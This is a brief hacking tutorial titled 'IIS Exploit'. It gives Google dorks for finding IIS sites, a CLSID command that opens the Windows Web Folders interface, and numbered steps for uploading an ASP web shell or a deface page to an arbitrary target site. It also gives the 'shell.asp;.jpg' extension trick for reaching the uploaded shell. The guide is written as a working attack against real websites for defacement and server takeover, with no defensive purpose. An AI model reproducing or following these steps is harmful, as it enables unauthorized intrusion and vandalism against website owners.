IIS Exploit







Finding Vulnerable Target

Dork:  inurl:"~r00t.txt"
             intext:"Powered by IIS"

MORE DORKS

1- Choose any dork and paste on Google

2- Choose any site


Exploiting Target

1- Go to Start>Run


2- Copy and paste this code in the text box

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}




3- Click OK

4-Now a window will open. Choose File > New > Web Folder




5-Type the website’s address you want to deface in the text box and Click Next then Finish

  
6- Now Go to the Web Folder you created In My Computer > My Network Places. Open the Folder Paste your Shell.asp or deface page.

7- Now, to access your shell or to see your Deface Page, just open your browser and type the site name and
your shell name of deface page name like this-

Shell

http://www.site.com/shell.asp;.jpg
 
Deface Page 

 http://www.site.com/deface-page.html